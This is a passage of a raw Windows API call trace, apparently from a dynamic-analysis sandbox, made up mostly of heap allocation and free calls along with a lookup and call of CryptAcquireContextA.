[0259.991] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0259.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0259.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0259.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0259.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0259.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0259.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0259.991] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0259.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0259.992] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0259.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0259.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0259.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0259.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0259.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0259.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0259.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0259.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0259.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0259.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0259.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0259.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0259.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0259.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0259.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0259.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0259.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0259.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0259.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0259.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0259.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0259.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0259.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0259.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0259.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0259.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0259.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0259.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0259.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.994] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0259.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0259.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0259.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0259.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0259.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0259.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0259.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0259.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0259.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0259.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0259.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0259.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0259.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0259.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0259.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0259.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0259.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0259.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0259.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0259.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0259.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0259.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0259.996] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0259.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0259.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0259.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0259.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0259.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0259.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0259.997] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0259.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0259.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0259.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0259.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0259.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0259.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0259.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0259.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0259.997] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad31c0) returned 1 [0259.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0259.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0259.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0259.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0259.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0259.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0259.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0259.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0259.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0259.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0259.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0259.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0259.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0259.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0259.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0259.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0259.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0259.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0259.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0259.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0259.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0260.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0260.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0260.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0260.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0260.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0260.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0260.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0260.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0260.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0260.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0260.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0260.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0260.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0260.001] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0260.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0260.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0260.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0260.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0260.002] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0260.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0260.002] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0260.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0260.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0260.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0260.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0260.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0260.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0260.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0260.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0260.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0260.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0260.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0260.004] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0260.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0260.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.004] 